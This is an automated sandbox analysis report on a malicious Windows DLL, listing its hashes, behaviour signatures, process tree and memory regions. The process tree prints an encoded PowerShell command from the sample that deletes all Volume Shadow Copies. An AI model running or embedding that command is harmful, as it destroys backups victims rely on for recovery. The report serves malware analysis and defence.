Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:58

General

  • Target

    d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll

  • Size

    166KB

  • MD5

    46a10b1e1fe68e124c86ee237751fd44

  • SHA1

    78f29761f7f0f57a8f92e5f23d9e4d2d6465e848

  • SHA256

    d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff

  • SHA512

    c0fbd92fcb136fd5376efba041d4170eccd8bae219812ef00dfc7edfe26f06b651153bdfa2b01d648ebbbc6901c3205790c26a037f85625c0722173d843e633a

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1376
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:788
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:832

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/948-55-0x0000000075F81000-0x0000000075F83000-memory.dmp
      Filesize

      8KB

    • memory/1376-56-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp
      Filesize

      8KB

    • memory/1376-57-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmp
      Filesize

      11.4MB

    • memory/1376-59-0x0000000002420000-0x0000000002422000-memory.dmp
      Filesize

      8KB

    • memory/1376-61-0x0000000002424000-0x0000000002427000-memory.dmp
      Filesize

      12KB

    • memory/1376-60-0x0000000002422000-0x0000000002424000-memory.dmp
      Filesize

      8KB

    • memory/1376-58-0x000000001B830000-0x000000001BB2F000-memory.dmp
      Filesize

      3.0MB

    • memory/1376-62-0x000000000242B000-0x000000000244A000-memory.dmp
      Filesize

      124KB